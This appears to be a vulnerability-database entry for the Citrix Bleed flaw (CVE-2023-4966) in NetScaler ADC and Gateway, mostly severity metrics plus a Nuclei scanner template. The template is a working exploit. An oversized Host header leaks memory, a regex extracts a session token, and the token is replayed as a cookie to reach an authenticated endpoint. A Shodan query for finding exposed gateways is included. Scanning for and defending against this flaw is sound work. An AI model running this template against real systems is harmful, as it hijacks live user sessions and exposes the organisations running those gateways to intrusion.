Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-4966
HistoryOct 24, 2023 - 10:58 a.m.

Citrix Bleed - Leaking Session Tokens

2023-10-2410:58:04
ProjectDiscovery
github.com
30
cve
citrix
adc
info-leak
exposure
session-tokens
netscaler-gateway

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.967 High

EPSS

Percentile

99.6%

Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.
id: CVE-2023-4966

info:
  name: Citrix Bleed - Leaking Session Tokens
  author: DhiyaneshDK
  severity: high
  description: |
    Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.
  reference:
    - https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py
    - https://github.com/Chocapikk/CVE-2023-4966
    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
    - https://x.com/assetnote/status/1716757539323564196?s=20
    - https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-4966
    cwe-id: CWE-119,NVD-CWE-noinfo
    epss-score: 0.96486
    epss-percentile: 0.9956
    cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: citrix
    product: netscaler_application_delivery_controller
    shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway"
  tags: cve,cve2023,citrix,adc,info-leak,kev,exposure
variables:
  payload: '{{repeat("a", 24812)}}'
  str: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |+
        GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
        {{str}}: {{Hostname}}
        Host: {{payload}}

      - |+
        POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
        Host: {{Hostname}}
        Cookie: NSC_AAAC={{session}}

    unsafe: true

    extractors:
      - type: regex
        name: session
        part: body_1
        group: 1
        regex:
          - '([a-f0-9]{100}45525d5f4f58455e445a4a42)'
        internal: true

      - type: regex
        part: body_2
        regex:
          - '([a-z0-9._]+)'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'NSC_AAAC='
          - 'HTTP/1.1'

      - type: word
        words:
          - '{"issuer":'
# digest: 490a00463044022077a1993e71e5fdd1862f1a2d4aa26ebf04e622ba6bbe56becbbdec39290eaf4a022045fc84cc3e43c597238379bc66e4ff39d89c0e483283a9891d37feedd9e4328f:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.967 High

EPSS

Percentile

99.6%